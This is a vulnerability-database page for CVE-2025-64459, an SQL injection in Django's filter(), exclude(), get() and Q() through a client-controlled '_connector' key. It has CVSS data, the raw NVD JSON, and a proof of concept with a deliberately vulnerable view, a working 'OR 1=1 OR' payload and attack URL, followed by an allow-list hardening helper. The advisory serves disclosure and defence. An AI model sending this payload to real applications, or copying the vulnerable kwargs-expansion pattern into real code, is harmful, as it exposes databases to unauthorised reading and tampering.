Security Vulnerability Report
CVE-2025-64459 CVSS 9.1 CRITICAL

Published: 2025-11-05 15:15:41
Last Modified: 2025-11-10 18:26:00
Source: 6a34fbeb-21d4-45e7-8e0a-62b95bc12c92

Description

An issue was discovered in Django 5.1 before 5.1.14, 4.2 before 4.2.26, and 5.2 before 5.2.8. The methods `QuerySet.filter()`, `QuerySet.exclude()`, and `QuerySet.get()`, and the class `Q()`, are subject to SQL injection when a suitably crafted dictionary is expanded (`**kwargs`) into one of these calls and thereby supplies the `_connector` argument: the connector string is spliced verbatim between the compiled lookup fragments of the WHERE clause and is never parameterised. An application is exposed only where it expands a client-controlled dictionary (for example `request.GET.dict()`) into one of these calls. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank cyberstan for reporting this issue.

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* - VULNERABLE, 4.2 <= version < 4.2.26
cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* - VULNERABLE, 5.1 <= version < 5.1.14
cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* - VULNERABLE, 5.2 <= version < 5.2.8
Django 4.2 < 4.2.26 (fixed in 4.2.26)
Django 5.1 < 5.1.14 (fixed in 5.1.14)
Django 5.2 < 5.2.8 (fixed in 5.2.8)
Django 5.0.x (unsupported, not evaluated, may be affected)
Django 4.1.x (unsupported, not evaluated, may be affected)
Django 3.2.x (unsupported, not evaluated, may be affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
"""
CVE-2025-64459 Django SQL injection PoC
Affected versions: Django 5.1 < 5.1.14, 4.2 < 4.2.26, 5.2 < 5.2.8

Mechanism: QuerySet.filter(), exclude() and get() forward their **kwargs to
Q(), whose signature is Q(*args, _connector=None, _negated=False, **kwargs).
If an application expands a client-controlled dict into one of these calls,
a key named "_connector" binds Q's connector, and WhereNode.as_sql() joins
the compiled lookup fragments with that string verbatim; it is never
parameterised. Requires a configured Django project; "app" is the assumed
app label for the table name shown below.
"""
from django.db import models
from django.db.models import Q
from django.http import JsonResponse


class Account(models.Model):
    username = models.CharField(max_length=150)
    email = models.EmailField()


# Vulnerable pattern: the query string is expanded straight into filter(),
# so the client controls the keyword names, not just the values.
def vulnerable_search(request):
    params = request.GET.dict()
    accounts = Account.objects.filter(**params)       # "_connector" reaches Q()
    return JsonResponse(list(accounts.values("username", "email")), safe=False)


# Attacker request. Two real lookups are needed: the connector is only
# emitted between children, a single child is rendered on its own.
#   GET /search/?username=x&email=y&_connector=OR%201%3D1%20OR
malicious_params = {
    "username": "x",
    "email": "y",
    "_connector": "OR 1=1 OR",
}

# What the view builds internally (kwargs are sorted by name inside Q()):
attacker_q = Q(**malicious_params)

# WHERE clause generated on a vulnerable release:
#   ("app_account"."email" = %s OR 1=1 OR "app_account"."username" = %s)
# Every row is returned; the same position can carry a subquery that reads
# other tables. exclude() and get() reach Q() through the same path, and a
# "_negated" key in the same dict flips the whole condition. Fixed releases
# reject a _connector that is not Q.AND, Q.OR or Q.XOR instead of building
# the query.
print(Account.objects.filter(attacker_q).query)
```
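The following is an added example, not code from the page's PoC, from Django, or from the reporter: it shows, without a database, where the connector string lands in the generated SQL, and the allow-list check an application should run on a client-supplied dictionary before expanding it into `filter()`, `exclude()`, `get()` or `Q()`. `render_where` models only Django's join of child fragments with `" <connector> "` (parenthesised when there is more than one child), not the rest of the SQL compiler; `ALLOWED_LOOKUPS`, the column fragments and the hostile parameters are constructed for illustration.

```python
"""
CVE-2025-64459: model of the injection point plus an allow-list hardening
helper for dictionaries that are expanded into Django ORM calls.
Stand-alone example; does not import Django.
"""
import re


def render_where(children_sql, connector):
    """Model of the join step in WhereNode.as_sql().

    Django joins the compiled SQL of a node's children with " <connector> "
    and wraps the result in parentheses when there is more than one child.
    The connector is a plain string, so a hostile value is spliced in as-is.
    """
    if not children_sql:
        return ""
    sql = (" %s " % connector).join(children_sql)
    return "(%s)" % sql if len(children_sql) > 1 else sql


# Lookups a search endpoint is willing to accept from a client (constructed
# allow-list). The key namespace, not the values, is what this CVE abuses.
ALLOWED_LOOKUPS = {"username", "username__icontains", "email", "email__iexact"}

# Shape of a legitimate field/lookup path: lowercase identifier characters.
LOOKUP_RE = re.compile(r"^[a-z][a-z0-9_]*$")


def harden_filter_kwargs(user_params, allowed=ALLOWED_LOOKUPS):
    """Return a dict that is safe to expand into filter()/exclude()/get()/Q().

    Raises ValueError for any key that
      * starts with "_" (would bind Q()'s private _connector or _negated),
      * is not a well-formed lookup path, or
      * is not on the endpoint's explicit allow-list.
    The allow-list is the durable control; the underscore rule alone covers
    only this CVE's vector. Upgrading Django is still required.
    """
    clean = {}
    for key, value in user_params.items():
        if key.startswith("_"):
            raise ValueError("private keyword argument rejected: %r" % key)
        if not LOOKUP_RE.match(key):
            raise ValueError("malformed lookup: %r" % key)
        if key not in allowed:
            raise ValueError("lookup not permitted on this endpoint: %r" % key)
        clean[key] = value
    return clean


def demo():
    """Run the hostile dict through both functions; returns the results."""
    # Constructed attacker input, as request.GET.dict() would deliver it.
    hostile = {"username": "x", "email": "y", "_connector": "OR 1=1 OR"}

    # Fragments Django would compile for the two real lookups (modelled;
    # Q() sorts kwargs by name, hence email before username).
    fragments = ['"app_account"."email" = %s', '"app_account"."username" = %s']
    unsafe_where = render_where(fragments, hostile["_connector"])

    try:
        harden_filter_kwargs(hostile)
        rejected = False
    except ValueError:
        rejected = True

    safe = harden_filter_kwargs({"username__icontains": "ali", "email": "a@b"})
    return unsafe_where, rejected, safe


if __name__ == "__main__":
    where, rejected, safe = demo()
    print(where)
    print("hostile dict rejected:", rejected)
    print("clean kwargs:", safe)
```

The single-child case in `render_where` is why a payload needs at least two genuine lookups in the same dictionary: with one child the connector is never emitted. To find candidate call sites in a code base, search for `filter(**`, `exclude(**`, `get(**` and `Q(**` and trace whether the expanded dict derives from `request.GET`, `request.POST`, a JSON body or any other client input.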

References

https://docs.djangoproject.com/en/dev/releases/security/ (Vendor Advisory)
https://www.djangoproject.com/weblog/2025/nov/05/security-releases/ (Vendor Advisory)
https://groups.google.com/g/django-announce (Mailing List)
https://shivasurya.me/security/django/2025/11/07/django-sql-injection-CVE-2025-64459.html (Exploit, Third Party Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-64459",
    "sourceIdentifier": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92",
    "published": "2025-11-05T15:15:41.080",
    "lastModified": "2025-11-10T18:25:59.883",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An issue was discovered in 5.1 before 5.1.14, 4.2 before 4.2.26, and 5.2 before 5.2.8.\nThe methods `QuerySet.filter()`, `QuerySet.exclude()`, and `QuerySet.get()`, and the class `Q()`, are subject to SQL injection when using a suitably crafted dictionary, with dictionary expansion, as the `_connector` argument.\nEarlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected.\nDjango would like to thank cyberstan for reporting this issue."
      },
      {
        "lang": "es",
        "value": "Se descubrió un problema en 5.1 anterior a 5.1.14, 4.2 anterior a 4.2.26 y 5.2 anterior a 5.2.8. Los métodos 'QuerySet.filter()', 'QuerySet.exclude()' y 'QuerySet.get()', y la clase 'Q()', están sujetos a inyección SQL cuando se utiliza un diccionario adecuadamente diseñado, con expansión de diccionario, como argumento '_connector'. Series anteriores de Django sin soporte (como 5.0.x, 4.1.x y 3.2.x) no fueron evaluadas y también pueden verse afectadas. Django desea agradecer a cyberstan por informar de este problema."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "4.2",
                "versionEndExcluding": "4.2.26",
                "matchCriteriaId": "5FC7EBE0-A60A-4083-9FB7-E4ADCD2B5F37"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "5.1",
                "versionEndExcluding": "5.1.14",
                "matchCriteriaId": "9F3A5471-02DB-428E-815E-516057A901FF"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "5.2",
                "versionEndExcluding": "5.2.8",
                "matchCriteriaId": "F56E9016-F93A-4DAE-8070-D3A4909F00A4"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://docs.djangoproject.com/en/dev/releases/security/",
        "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92",
        "tags": ["Vendor Advisory"]
      },
      {
        "url": "https://groups.google.com/g/django-announce",
        "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92",
        "tags": ["Mailing List"]
      },
      {
        "url": "https://www.djangoproject.com/weblog/2025/nov/05/security-releases/",
        "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92",
        "tags": ["Vendor Advisory"]
      },
      {
        "url": "https://shivasurya.me/security/django/2025/11/07/django-sql-injection-CVE-2025-64459.html",
        "source": "af854a3a-2127-422b-91ae-364da2661108",
        "tags": ["Exploit", "Third Party Advisory"]
      }
    ]
  }
}
```